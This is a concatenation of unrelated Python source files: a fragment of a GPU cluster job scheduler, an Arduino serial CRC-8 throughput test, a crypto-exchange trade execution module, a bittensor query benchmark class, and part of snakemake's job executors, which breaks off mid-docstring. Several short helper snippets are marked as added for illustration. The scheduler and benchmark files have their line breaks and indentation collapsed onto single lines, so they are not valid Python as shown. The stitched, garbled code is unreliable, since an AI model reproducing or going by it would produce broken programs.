K80_job[gpu] = 'idle' K80_used -= 1 # stop all demoted jobs on P100 for gpu, job in P100_job.items(): if job in total_demoted: real_node, real_gpu = P100_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: P100_time[job] += int(time.time() - P100_start_time[job]) checkpoint_finish_check.append(job) P100_job[gpu] = 'idle' P100_used -= 1 P100_demote_list.remove(job) if new_arrival == 0 and K80_free == K80_cap: # stop all 
promoted jobs on P100 checkpoint_finish_check = [] for gpu, job in P100_job.items(): if job in total_promoted: real_node, real_gpu = P100_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: P100_time[job] += int(time.time() - P100_start_time[job]) checkpoint_finish_check.append(job) P100_job[gpu] = 'idle' P100_used -= 1 # stop all demoted jobs on V100 for gpu, job in V100_job.items(): if job in total_demoted: real_node, real_gpu = V100_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: V100_time[job] += int(time.time() - V100_start_time[job]) checkpoint_finish_check.append(job) V100_job[gpu] = 'idle' V100_used -= 1 V100_demote_list.remove(job) # wait for all GPUs to be available if len(checkpoint_finish_check) > 0: while True: time.sleep(5) for job in checkpoint_finish_check[:]: if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free print(job + ' checkpointed successfully', file=run_log, flush=True) checkpoint_dict['job'+job] = 0 # reset it checkpoint_finish_check.remove(job) # also check if job already finished before sending checkpoint signal elif finish_dict['job'+job] == 1: print(job + ' finished before receiving checkpoint signal', file=run_log, flush=True) checkpoint_finish_check.remove(job) if len(checkpoint_finish_check) == 0: break # give it some time to cleanup old checkpointed jobs time.sleep(3) # resume promoted jobs on V100, make sure the gpu is idle for job_new in V100_promoted[:]: if finish_dict['job'+job_new] != 1: for gpu, job in V100_job.items(): if job == 'idle': # if gpu idle, schedule new job here V100_job[gpu] = job_new real_node, real_gpu = V100_LUT(gpu) resume_job(real_node, real_gpu, job_new) num_mig[job_new] += 1 total_promoted.remove(job_new) V100_used += 1 break else: # job has already finished before checkpointing total_promoted.remove(job_new) # resume promoted jobs on P100, make sure the gpu is idle for job_new in P100_promoted[:]: if finish_dict['job'+job_new] != 1: for gpu, job in P100_job.items(): if job == 'idle': # if gpu idle, schedule new job here P100_job[gpu] = job_new real_node, real_gpu = P100_LUT(gpu) resume_job(real_node, real_gpu, job_new) num_mig[job_new] += 1 total_promoted.remove(job_new) P100_used += 1 break else: # job has already finished before checkpointing total_promoted.remove(job_new) # resume demoted jobs on K80, make sure the gpu is idle for job_new in total_demoted[:]: if finish_dict['job'+job_new] != 1: for gpu, job in K80_job.items(): if job == 'idle': # if gpu idle, schedule new job here real_node, real_gpu = K80_LUT(gpu) resume_job(real_node, real_gpu, job_new) num_mig[job_new] += 1 K80_job[gpu] = job_new total_demoted.remove(job_new) K80_used += 1 break else: # job has already finished before checkpointing print('job'+job_new+' has finished before checkpointing', file=run_log, flush=True) total_demoted.remove(job_new) # perform a check, make sure all promoted/demoted jobs are scheduled if len(total_promoted) > 0 or len(total_demoted) > 0: raise ValueError('Bug with promotion scheme, more jobs than free gpus') ################ submit new jobs to vacant GPUs ############################ if not all_jobs_started: if V100_used < V100_cap: V100_free = V100_cap - V100_used for i in range(V100_free): time_passed = int(time.time() - queue_timer) if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue job_new = str(queue[index]) for gpu, job in V100_job.items(): if job == 'idle': # schedule new job here if idle real_node, real_gpu = 
V100_LUT(gpu) start_job(real_node, real_gpu, job_new) birthplace[job_new] = real_node measure_job(real_node, real_gpu, job_new) V100_job[gpu] = job_new job_start[job_new] = time.time() queue_delay[job_new] = int(time_passed - queue_dict[queue[index]]) V100_start_time[job_new] = time.time() index += 1 V100_used += 1 time.sleep(5) # don't communicate too often break elif index >= len(queue): all_jobs_started = True if not all_jobs_started: if P100_used < P100_cap: P100_free = P100_cap - P100_used for i in range(P100_free): time_passed = int(time.time() - queue_timer) if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue job_new = str(queue[index]) for gpu, job in P100_job.items(): if job == 'idle': # schedule new job here if idle real_node, real_gpu = P100_LUT(gpu) start_job(real_node, real_gpu, job_new) birthplace[job_new] = real_node measure_job(real_node, real_gpu, job_new) P100_job[gpu] = job_new job_start[job_new] = time.time() queue_delay[job_new] = int(time_passed - queue_dict[queue[index]]) P100_start_time[job_new] = time.time() index += 1 P100_used += 1 time.sleep(5) # don't communicate too often break elif index >= len(queue): all_jobs_started = True ############## monitor GPU usage ############ usage = K80_used + P100_used + V100_used time_stamp = int(time.time() - queue_timer) gpu_usage_time.append(time_stamp) gpu_usage.append(usage) total_completion = np.sum(list(completion.values())) gpu_usage_completion.append(total_completion) ############### wait for next iteration time.sleep(INTERVAL) ################ check if termination condition is met ################ K80_idle_num = sum(value == 'idle' for value in K80_job.values()) P100_idle_num = sum(value == 'idle' for value in P100_job.values()) V100_idle_num = sum(value == 'idle' for value in V100_job.values()) if K80_idle_num == K80_cap and P100_idle_num == P100_cap and V100_idle_num == V100_cap and index == len(queue): print('all jobs are finished!', file=run_log, flush=True) break # get average JCT average_JCT = np.average(list(JCT.values())) JCT['average'] = average_JCT average_overhead = np.average(list(overhead.values())) overhead['average'] = average_overhead average_queue_delay = np.average(list(queue_delay.values())) queue_delay['average'] = average_queue_delay # after everything is finished print('finished all runs', file=run_log, flush=True) JCT_name = testcase + '_JCT.json' overhead_name = testcase + '_overhead.json' num_mig_name = testcase + '_num_mig.json' epoch_waste_name = testcase + '_epoch_waste.json' ckpt_qual_name = 'ckpt_qual.json' finish_name = 'finish.json' K80_time_name = testcase + '_K80_time.json' P100_time_name = testcase + '_P100_time.json' V100_time_name = testcase + '_V100_time.json' gpu_usage_name = testcase + '_gpu_usage.csv' ovhd_a_name = testcase + '_ovhd_a.json' ovhd_b_name = testcase + '_ovhd_b.json' ovhd_c_name = testcase + '_ovhd_c.json' ovhd_d_name = testcase + '_ovhd_d.json' ovhd_total_name = testcase + '_ovhd_total.json' k80_1st_name = testcase + '_k80_1st.json' p100_1st_name = testcase + '_p100_1st.json' v100_1st_name = testcase + '_v100_1st.json' speedup_name_V100 = 'speedup_V100.json' speedup_name_P100 = 'speedup_P100.json' predict_name_V100 = 'predict_V100.json' predict_name_P100 = 'predict_P100.json' V100_demote_list_name = 'V100_demote_list.json' P100_demote_list_name = 'P100_demote_list.json' completion_name = 'completion.json' queue_delay_name = testcase + '_queue_delay.json' birthplace_name = testcase + '_birthplace.json' with 
open(JCT_name, 'w') as fp1: json.dump(JCT, fp1, sort_keys=True, indent=4) with open(overhead_name, 'w') as fp3: json.dump(overhead, fp3, sort_keys=True, indent=4) with open(num_mig_name, 'w') as fp3: json.dump(num_mig, fp3, sort_keys=True, indent=4) with open(epoch_waste_name, 'w') as fp3: json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4) with open(ckpt_qual_name, 'w') as fp1: json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4) with open(finish_name, 'w') as fp1: json.dump(finish_dict, fp1, sort_keys=True, indent=4) with open(K80_time_name, 'w') as fp3: json.dump(K80_time, fp3, sort_keys=True, indent=4) with open(P100_time_name, 'w') as fp3: json.dump(P100_time, fp3, sort_keys=True, indent=4) with open(V100_time_name, 'w') as fp3: json.dump(V100_time, fp3, sort_keys=True, indent=4) with open(ovhd_a_name, 'w') as fp3: json.dump(ovhd_a, fp3, sort_keys=True, indent=4) with open(ovhd_b_name, 'w') as fp3: json.dump(ovhd_b, fp3, sort_keys=True, indent=4) with open(ovhd_c_name, 'w') as fp3: json.dump(ovhd_c, fp3, sort_keys=True, indent=4) with open(ovhd_d_name, 'w') as fp3: json.dump(ovhd_d, fp3, sort_keys=True, indent=4) with open(ovhd_total_name, 'w') as fp3: json.dump(ovhd_total, fp3, sort_keys=True, indent=4) with open(k80_1st_name, 'w') as fp3: json.dump(k80_1st, fp3, sort_keys=True, indent=4) with open(p100_1st_name, 'w') as fp3: json.dump(p100_1st, fp3, sort_keys=True, indent=4) with open(v100_1st_name, 'w') as fp3: json.dump(v100_1st, fp3, sort_keys=True, indent=4) with open(speedup_name_V100, 'w') as fp1: json.dump(speedup_dict_V100, fp1, sort_keys=True, indent=4) with open(speedup_name_P100, 'w') as fp1: json.dump(speedup_dict_P100, fp1, sort_keys=True, indent=4) with open(predict_name_V100, 'w') as fp1: json.dump(predict_dict_V100, fp1, sort_keys=True, indent=4) with open(predict_name_P100, 'w') as fp1: json.dump(predict_dict_P100, fp1, sort_keys=True, indent=4) with open(V100_demote_list_name, 'w') as fp1: json.dump(V100_demote_list, fp1, sort_keys=True, indent=4) with open(P100_demote_list_name, 'w') as fp1: json.dump(P100_demote_list, fp1, sort_keys=True, indent=4) with open(completion_name, 'w') as fp1: json.dump(completion, fp1, sort_keys=True, indent=4) with open(queue_delay_name, 'w') as fp1: json.dump(queue_delay, fp1, sort_keys=True, indent=4) with open(birthplace_name, 'w') as fp1: json.dump(birthplace, fp1, sort_keys=True, indent=4) gpu_usage_time = np.asarray(gpu_usage_time) gpu_usage = np.asarray(gpu_usage) gpu_usage_completion = np.asarray(gpu_usage_completion) rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion) with open(gpu_usage_name, 'w') as f: writer = csv.writer(f) for row in rows: writer.writerow(row)
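
# A small reader (added for illustration, not part of the scheduler) for the artifacts
# dumped above. It assumes the same testcase-prefixed file names the scheduler writes;
# summarize_run is a hypothetical helper name.
def summarize_run(testcase):
    import csv
    import json
    # The JCT dict gains an 'average' key before it is dumped above.
    with open(testcase + '_JCT.json') as f:
        jct = json.load(f)
    print('average JCT: {:.1f}s over {} jobs'.format(jct['average'], len(jct) - 1))
    # Each usage CSV row is (seconds since start, GPUs in use, total completion).
    with open(testcase + '_gpu_usage.csv') as f:
        rows = [r for r in csv.reader(f) if r]
    peak = max(int(u) for _, u, _ in rows)
    print('peak GPU usage: {} GPUs over {} samples'.format(peak, len(rows)))

# Usage: summarize_run(testcase)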
serial_talk.py
#!/usr/bin/env python3
import serial
import struct
from threading import Thread
import sys
import time
import keyboard
import crc8
from random import random

msg = [0, 0, 0]
count = 0
corrupted = 0
wrong_len = 0

# baudrate - msg/sec - isOk
# 9600       63   True
# 14400      98   True
# 19200      129  True
# 28800      189  True
# 38400      242  True
# 57600      318  False (fail on 6586)
# 115200     451  False (fail on 6871)
serialPort = serial.Serial('/dev/ttyACM0', 9600, timeout=1, write_timeout=5)
trigger = False
isConnected = False

def print_data():
    while not trigger:
        sys.stdout.write(
            f"\rcount={count}, corrupted={corrupted}, wrong_len={wrong_len}")
        sys.stdout.flush()
        time.sleep(0.1)

def talk():
    global msg, count, wrong_len, response, corrupted
    printer_thread.start()
    start = time.perf_counter()
    while not trigger:
        # tx
        byte_array = struct.pack('3f', random(), random(), random())
        hash = crc8.crc8()  # MUST make new one on each iteration
        hash.update(byte_array)
        checksum = hash.digest()
        serialPort.write(byte_array)
        serialPort.write(checksum)
        serialPort.write(b'\n')
        serialPort.reset_output_buffer()
        # rx
        response = serialPort.readline()
        count += 1
        if len(response) == 14:
            hash = crc8.crc8()  # MUST make new one on each iteration
            hash.update(response[0:12])
            checksum = hash.digest()
            # print(f"msg: {msg}; crc8: p={checksum} | a={bytes([response[12]])}")
            if checksum == bytes([response[12]]):
                msg = struct.unpack('3f', response[0:12])
            else:
                corrupted += 1
        else:
            wrong_len += 1
    end = time.perf_counter()
    print(f"\nAverage msg/sec = {count/(end-start)}")

arduino_talker_thread = Thread(target=talk)
printer_thread = Thread(target=print_data)
arduino_talker_thread.start()
keyboard.wait('esc')
trigger = True
arduino_talker_thread.join()
printer_thread.join()
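
# The sketch below (added for illustration, not part of the original script) factors the
# 14-byte frame layout used above -- three packed floats, one CRC-8 byte, one b'\n'
# terminator -- into a pair of helpers. encode_frame/decode_frame are hypothetical names.
import struct
import crc8

def encode_frame(vals):
    # Pack three floats, then append their CRC-8 digest and the terminator,
    # mirroring the tx branch of talk().
    payload = struct.pack('3f', *vals)
    h = crc8.crc8()
    h.update(payload)
    return payload + h.digest() + b'\n'

def decode_frame(frame):
    # Return the three floats, or None on a wrong length or checksum,
    # mirroring the rx branch of talk().
    if len(frame) != 14:
        return None
    h = crc8.crc8()
    h.update(frame[0:12])
    if h.digest() != bytes([frame[12]]):
        return None
    return struct.unpack('3f', frame[0:12])

# Round-trip self-check: a valid frame decodes, a corrupted one does not.
assert decode_frame(encode_frame((0.1, 0.2, 0.3))) is not None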
execute.py
import time
import threading
import math

from utils.client import auth_from_order
from trades.models import OrderTask
from exchanges.views import EXCHANGE_APIS
from exchanges.abstract import Order
from main.models import BotTrade


def execute_trade(order):
    # ISSUE: this is messing with the nonces when there are parallel requests with the same api keys
    # ISSUE: make sure that 'autofilled' is factored in => affects what trade amount to calculate
    #balances = api_get("exchanges:user_detail", order.user.auth_token.key, order_params(order))["result"]["balances"]
    print(order.total_trades, order.trades_made)
    try:
        trade_amount = 1.0 * order.amount_remaining / (order.total_trades - order.trades_made)
    except ZeroDivisionError:
        return
    ex = EXCHANGE_APIS[order.exchange]
    ticker = ex.pair_ticker(order.trading_pair)
    if order.autofilled and order.direction == OrderTask.DIRECTION_BUY:
        trade_amount = 0.98 * trade_amount / ticker.ask
    if order.direction == OrderTask.DIRECTION_BUY:
        price = 1.02 * ticker.ask
    else:
        price = 0.98 * ticker.bid
    api_order = Order(
        order.trading_pair,
        Order.LIMIT_ORDER,
        order.direction,
        floor_amount(trade_amount),
        price=round_figures(price, 5)
    )
    order_id = ex.order_create(api_order, auth_from_order(order))
    print(order_id)
    order.trades_made += 1
    order.save()


def batch_execute(orders):
    for order in orders:
        thr = threading.Thread(target=execute_trade, args=(order,), kwargs={})
        thr.start()


def round_figures(x, n):
    """Returns x rounded to n significant figures.
    from https://mail.python.org/pipermail/tutor/2009-September/071393.html
    """
    return round(x, int(n - math.ceil(math.log10(abs(x)))))


def floor_amount(x):
    """Returns x floored to six decimal places."""
    factor = 1000000
    return 1.0 * int(x * factor) / factor
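
# Worked examples (added for illustration; not in the original module): round_figures
# keeps n significant figures, while floor_amount truncates at six decimal places so a
# computed trade size is cut down rather than rounded up.
if __name__ == '__main__':
    assert round_figures(1234.5678, 5) == 1234.6
    assert round_figures(0.00123456, 5) == 0.0012346
    assert floor_amount(0.123456789) == 0.123456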
__init__.py
#!/bin/python3 # The MIT License (MIT) # Copyright © 2021 Yuma Rao # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the “Software”), to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all copies or substantial portions of # the Software. # THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. """ Benchmarking pytest fixture. Example: $ python3 benchmarks/template_miner.py --nucleus.nhid 600 """ import sys import os import pandas as pd import signal import bittensor import time import argparse import multiprocessing as mp import bittensor from rich.console import Console from rich.progress import track from bittensor._wallet import wallet from bittensor._subtensor.subtensor_mock import mock_subtensor # Turns off console output. bittensor.turn_console_off() class QueryBenchmark: r""" Benchmark super class. """ def __init__(self): r""" Start up benchmark background processes. """ mock_subtensor.kill_global_mock_process() self.conf = QueryBenchmark.benchmark_config() bittensor.logging( config = self.conf ) self.subtensor = bittensor.subtensor(_mock=True) self.graph = bittensor.metagraph( subtensor = self.subtensor , _mock=True) self.wallet = bittensor.wallet(_mock=True) self.dendrite = bittensor.dendrite( wallet = self.wallet, multiprocess = False, _mock=True ) self.console = Console() self.log_dir = os.path.expanduser('{}/{}/{}/{}/{}'.format( os.path.dirname(os.path.realpath(__file__)), '/results/', 'mock', 'default', self.miner_name() )) self.console.log( 'Logging to: [bold blue]{}[/bold blue]'.format( self.log_dir ) ) if not os.path.exists(self.log_dir): os.makedirs(self.log_dir) @classmethod def benchmark_config(cls) -> 'bittensor.Config': """ Get config from the argument parser """ parser = argparse.ArgumentParser() cls.add_args( parser = parser ) return bittensor.config( parser ) @classmethod def add_args( cls, parser: argparse.ArgumentParser ): try: parser.add_argument('--n_calls', type=int, help='Number of function calls.', default=100) parser.add_argument('--batch_size', type=int, help='Batch size', default=10) parser.add_argument('--block_size', type=int, help='Block_size', default=10) parser.add_argument('--delay', type=int, help='Message delay', default=0) parser.add_argument('--test_multiprocessing', action='store_true', help='Test with multiprocessing.', default=False) parser.add_argument('--n_processes', type=int, help='Number of process if --test_multiprocessing is True.', default=10) parser.add_argument('--restart_stats', action='store_true', help='If set, clean up old stats', default=False) except argparse.ArgumentError: # re-parsing arguments. 
pass bittensor.logging.add_args( parser ) @classmethod def help(cls): """ Print help to stdout """ parser = argparse.ArgumentParser() cls.add_args( parser ) print (cls.__new__.__doc__) parser.print_help() @staticmethod def miner_name() -> str: r""" Return miner name """ raise NotImplementedError @staticmethod def run_neuron( config ): r""" To be implemented in the subclass, runs the neuron. Args: config (bittensor.Config) Run config """ raise NotImplementedError @staticmethod def config() -> 'bittensor.Config': r""" Return config Returns: config (bittensor.Config) Run config. """ raise NotImplementedError def _run_background_process(self, run_neuron_func, config_func): r""" Pulls the config and starts the subclass static run method. Args: run_neuron_func (Callable): function which runs neuron. config_func (Callable): function which returns neuron config. """ config = config_func() config.wallet.name = 'mock' config.subtensor.network = 'mock' config.dataset._mock = True config.logging.record_log = True config.logging.logging_dir = 'benchmarks/results/' if not config.logging.debug: sys.stdout = open(os.devnull, 'w') run_neuron_func ( config, self.subtensor,self.graph, self.wallet) def startup(self): r""" Starts mining process. """ self.process = mp.Process( target=self._run_background_process, args=(self.run_neuron, self.config)) self.process.daemon = False self.process.start() self.process.pid def shutdown(self): r""" Terminates the mining process. """ try: self.dendrite.__del__() self.process.terminate() os.kill(self.process.pid, signal.SIGINT) self.process.join( 3 ) except: pass def __del__(self): r""" Tear down benchmark background processes. """ self.shutdown() def find_endpoint(self): r""" Finds the background neuron axon endpoint from the chain. Returns: endpoint (bittensor.Endpoint) endpoint to query for background process. """ start_time = time.time() with self.console.status("Starting miner ..."): while True: if self.wallet.hotkey.ss58_address in self.graph.hotkeys: endpoint = self.graph.endpoint_objs[ self.graph.hotkeys.index( self.wallet.hotkey.ss58_address ) ] if endpoint.ip != '0.0.0.0': break if time.time() - start_time > 100 * bittensor.__blocktime__: print ( 'Failed to make connection to miner, check logs by passing flag --logging.debug') sys.exit() self.graph.sync() time.sleep(bittensor.__blocktime__) self.endpoint = endpoint @staticmethod def dend_forward(args): r""" Handles the dendrite request for the multiproceeing case. Args: wallet (bittensor.Wallet): The wallet for creating dendrite. endpoint (bittensor.endpoint): The enpoint that was being benchmarked on. inputs (tensor): The input tensor. results (mp.manager.list): Where we can store a list of result across processes. """ wallet, endpoint, dataset, n = args dendrite = bittensor.dendrite( wallet = wallet, multiprocess = True ) results = [] for i in range(n): _, codes, qtime = dendrite.forward_text( endpoints = endpoint, inputs = next(dataset) ) results.append([ qtime.item(), codes.item(), time.time()]) return results def query_sequence( self, ncalls:int, batch_size:int, block_size:int ) -> pd.DataFrame: r""" Queries the background neuron with passed parameters Args: ncalls (int): Number of sequential calls made. batch_size (int): Batch size for each request. block_size (int): Sequence length. 
Returns: history (List[Dict[int, float, int, float)] (n, query_length, code, query_time) tuple """ dataset = bittensor.dataset( _mock = True, batch_size = batch_size, block_size = block_size ) start_time = time.time() self.console.log( 'Running:\n\tqueries: {}\n\tbatch size: {}\n\tblock_length: {}'.format( str(ncalls).ljust(20), str(batch_size).ljust(20), str(block_size).ljust(20) ) ) if self.conf.test_multiprocessing: with mp.Pool(self.conf.n_processes) as p: results_list = p.map(self.dend_forward, [(self.wallet, self.endpoint, dataset, round(self.conf.n_calls / self.conf.n_processes) )]*self.conf.n_processes) results = [] for result in results_list: results += result else: results = [] for i in track(range(ncalls), description="Querying endpoint..."): _, codes, qtime = self.dendrite.forward_text( endpoints = self.endpoint, inputs = next( dataset ) ) results.append( [ qtime.item(), codes.item(), time.time() - start_time ]) time.sleep( self.conf.delay ) df = pd.DataFrame( data = results, columns = ['time', 'code', 'elapsed' ] ) df['n_processes'] = self.conf.n_processes df['n_calls'] = self.conf.n_calls df['batch_size'] = self.conf.batch_size df['block_size'] = self.conf.block_size if 'world_size' in self.config().neuron: df['world_size'] = self.config().neuron.world_size else: df['world_size'] = 1 return df def print_query_analysis( self, history ): r""" Prints analysis from the query trial. """ self.console.print( '\tQPS:\t [bold blue]{}[/bold blue]'.format( str(1/history['time'].mean()).ljust(20) )) self.console.print( '\tSuccess:\t [bold blue]{}[/bold blue]'.format( str( len(history[history.code == 1])/len(history) ).ljust(20) )) print( history.describe() ) def run_standard_benchmark(self): r""" Tests default query sizes """ stats = self.query_sequence( ncalls = self.conf.n_calls, batch_size = self.conf.batch_size, block_size = self.conf.block_size ) self.print_query_analysis( stats ) if self.conf.restart_stats: stats.to_csv( self.log_dir + '/queries.csv' ) else: history = pd.read_csv(self.log_dir + '/queries.csv' , index_col=0) stats = pd.concat([history, stats]) stats = stats.reset_index(drop = True) stats.to_csv( self.log_dir + '/queries.csv' ) def run(self): r""" Runs all funcs with benchmark_ prefix. """ self.startup() self.find_endpoint() self.run_standard_benchmark() for func in dir(self): if callable(getattr(self, func)) and func.startswith("benchmark_"): self.console.log('\nRunning benchmark: [bold blue]{}[/bold blue]'.format(func)) eval('self.' + func + "()") self.console.log('Done\n') self.shutdown()
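
# A minimal sketch (illustrative, not from the original file) of how a concrete benchmark
# plugs into QueryBenchmark: it supplies a name, a neuron runner and a config, then calls
# run(). The two raising methods below are placeholders for a real miner's entry points.
class TemplateMinerBenchmark(QueryBenchmark):

    @staticmethod
    def miner_name() -> str:
        # Used only to build the results directory path.
        return 'template_miner'

    @staticmethod
    def run_neuron(config, subtensor, metagraph, wallet):
        # _run_background_process() calls this with (config, subtensor, graph, wallet);
        # replace the body with the real miner's run entry point.
        raise NotImplementedError

    @staticmethod
    def config() -> 'bittensor.Config':
        # Replace with the miner's own config constructor.
        raise NotImplementedError

# Usage (once the placeholders are filled in):
#     TemplateMinerBenchmark().run()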
executors.py
__author__ = "Johannes Köster" __contributors__ = ["David Alexander"] __copyright__ = "Copyright 2015, Johannes Köster" __email__ = "koester@jimmy.harvard.edu" __license__ = "MIT" import os import sys import contextlib import time import datetime import json import textwrap import stat import shutil import shlex import threading import concurrent.futures import subprocess import signal from functools import partial from itertools import chain from collections import namedtuple from tempfile import mkdtemp import random import base64 import uuid from snakemake.jobs import Job from snakemake.shell import shell from snakemake.logging import logger from snakemake.stats import Stats from snakemake.utils import format, Unformattable, makedirs from snakemake.io import get_wildcard_names, Wildcards from snakemake.exceptions import print_exception, get_exception_origin from snakemake.exceptions import format_error, RuleException, log_verbose_traceback from snakemake.exceptions import ProtectedOutputException, WorkflowError, ImproperShadowException, SpawnedJobError from snakemake.common import Mode, __version__, get_container_image, get_uuid def sleep(): # do not sleep on CI. In that case we just want to quickly test everything. if os.environ.get("CIRCLECI") != "true": time.sleep(10) class AbstractExecutor: def __init__(self, workflow, dag, printreason=False, quiet=False, printshellcmds=False, printthreads=True, latency_wait=3): self.workflow = workflow self.dag = dag self.quiet = quiet self.printreason = printreason self.printshellcmds = printshellcmds self.printthreads = printthreads self.latency_wait = latency_wait def get_default_remote_provider_args(self): if self.workflow.default_remote_provider: return ( " --default-remote-provider {} " "--default-remote-prefix {} ").format( self.workflow.default_remote_provider.__module__.split(".")[-1], self.workflow.default_remote_prefix) return "" def run(self, job, callback=None, submit_callback=None, error_callback=None): self._run(job) callback(job) def shutdown(self): pass def cancel(self): pass def _run(self, job): job.check_protected_output() self.printjob(job) def rule_prefix(self, job): return "local " if job.is_local else "" def printjob(self, job): job.log_info(skip_dynamic=True) def print_job_error(self, job, msg=None, **kwargs): job.log_error(msg, **kwargs) def handle_job_success(self, job): pass def handle_job_error(self, job): pass class DryrunExecutor(AbstractExecutor): pass class RealExecutor(AbstractExecutor): def __init__(self, workflow, dag, printreason=False, quiet=False, printshellcmds=False, latency_wait=3, assume_shared_fs=True): super().__init__(workflow, dag, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait) self.assume_shared_fs = assume_shared_fs self.stats = Stats() self.snakefile = workflow.snakefile def register_job(self, job): job.register() def _run(self, job, callback=None, error_callback=None): super()._run(job) self.stats.report_job_start(job) try: self.register_job(job) except IOError as e: logger.info( "Failed to set marker file for job started ({}). " "Snakemake will work, but cannot ensure that output files " "are complete in case of a kill signal or power loss. 
" "Please ensure write permissions for the " "directory {}".format(e, self.workflow.persistence.path)) def handle_job_success(self, job, upload_remote=True, handle_log=True, handle_touch=True, ignore_missing_output=False): job.postprocess(upload_remote=upload_remote, handle_log=handle_log, handle_touch=handle_touch, ignore_missing_output=ignore_missing_output, latency_wait=self.latency_wait, assume_shared_fs=self.assume_shared_fs) self.stats.report_job_end(job) def handle_job_error(self, job, upload_remote=True): job.postprocess(error=True, assume_shared_fs=self.assume_shared_fs, latency_wait=self.latency_wait) def format_job_pattern(self, pattern, job=None, **kwargs): overwrite_workdir = [] if self.workflow.overwrite_workdir: overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir)) overwrite_config = [] if self.workflow.overwrite_configfile: overwrite_config.extend(("--configfile", self.workflow.overwrite_configfile)) if self.workflow.config_args: overwrite_config.append("--config") overwrite_config.extend(self.workflow.config_args) printshellcmds = "" if self.workflow.printshellcmds: printshellcmds = "-p" if not job.is_branched and not job.is_updated: # Restrict considered rules. This does not work for updated jobs # because they need to be updated in the spawned process as well. rules = ["--allowed-rules"] rules.extend(job.rules) else: rules = [] return format(pattern, job=job, attempt=job.attempt, overwrite_workdir=overwrite_workdir, overwrite_config=overwrite_config, printshellcmds=printshellcmds, workflow=self.workflow, snakefile=self.snakefile, cores=self.cores, benchmark_repeats=job.benchmark_repeats if not job.is_group() else None, target=job.get_targets(), rules=rules, **kwargs) class TouchExecutor(RealExecutor): def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) try: #Touching of output files will be done by handle_job_success time.sleep(0.1) callback(job) except OSError as ex: print_exception(ex, self.workflow.linemaps) error_callback(job) def handle_job_success(self, job): super().handle_job_success(job, ignore_missing_output=True) _ProcessPoolExceptions = (KeyboardInterrupt, ) try: from concurrent.futures.process import BrokenProcessPool _ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool) except ImportError: pass class CPUExecutor(RealExecutor): def __init__(self, workflow, dag, workers, printreason=False, quiet=False, printshellcmds=False, use_threads=False, latency_wait=3, cores=1): super().__init__(workflow, dag, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait) self.exec_job = '\\\n'.join(( 'cd {workflow.workdir_init} && ', '{sys.executable} -m snakemake {target} --snakefile {snakefile} ', '--force -j{cores} --keep-target-files --keep-remote ', '--attempt {attempt} ', '--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ', '--latency-wait {latency_wait} ', self.get_default_remote_provider_args(), '{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ', '--notemp --quiet --no-hooks --nolock --mode {} '.format(Mode.subprocess))) if self.workflow.shadow_prefix: self.exec_job += " --shadow-prefix {} ".format( self.workflow.shadow_prefix) if self.workflow.use_conda: self.exec_job += " --use-conda " if self.workflow.conda_prefix: self.exec_job += " --conda-prefix {} ".format( self.workflow.conda_prefix) if self.workflow.use_singularity: self.exec_job += " --use-singularity " if self.workflow.singularity_prefix: self.exec_job += " 
--singularity-prefix {} ".format( self.workflow.singularity_prefix) if self.workflow.singularity_args: self.exec_job += " --singularity-args \"{}\"".format( self.workflow.singularity_args) if self.workflow.use_docker: self.exec_job += " --use-docker " #if self.workflow.singularity_prefix: # self.exec_job += " --singularity-prefix {} ".format( # self.workflow.singularity_prefix) if self.workflow.docker_args: self.exec_job += " --docker-args \"{}\"".format( self.workflow.docker_args) self.use_threads = use_threads self.cores = cores self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=workers + 1) def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) if job.is_group(): # the future waits for the entire group job future = self.pool.submit(self.run_group_job, job) else: future = self.run_single_job(job) future.add_done_callback(partial(self._callback, job, callback, error_callback)) def job_args_and_prepare(self, job): job.prepare() conda_env = job.conda_env_path singularity_img = job.singularity_img_path benchmark = None benchmark_repeats = job.benchmark_repeats or 1 if job.benchmark is not None: benchmark = str(job.benchmark) return (job.rule, job.input.plainstrings(), job.output.plainstrings(), job.params, job.wildcards, job.threads, job.resources, job.log.plainstrings(), benchmark, benchmark_repeats, conda_env, singularity_img, self.workflow.singularity_args, self.workflow.use_singularity, self.workflow.linemaps, self.workflow.debug, job.shadow_dir, job.jobid, job.docker_img, self.workflow.docker_args, self.workflow.use_docker) # y singularity_img is in job and not in workflow? where is job? def run_single_job(self, job): if self.use_threads or (not job.is_shadow and not job.is_run): future = self.pool.submit( run_wrapper, *self.job_args_and_prepare(job)) else: # run directive jobs are spawned into subprocesses future = self.pool.submit(self.spawn_job, job) return future def run_group_job(self, job): """Run a pipe group job. 
